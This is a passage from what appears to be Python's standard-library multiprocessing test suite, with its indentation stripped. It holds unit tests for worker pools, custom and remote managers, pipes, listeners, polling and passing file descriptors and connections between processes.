n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# call pool.terminate()
# pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with support.check_warnings(('unclosed running multiprocessing pool',
ResourceWarning)):
pool = None
support.gc_collect()
def raising():
raise KeyError("key")
class Unpickleable(object):
def __reduce__(self):
raise pickle.PicklingError("intentionally unpickleable")
def unpickleable_result():
return Unpickleable()
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
@unittest.skipIf(test.support.stackless, "Stackless can pickle lambdas")
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((test.support.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
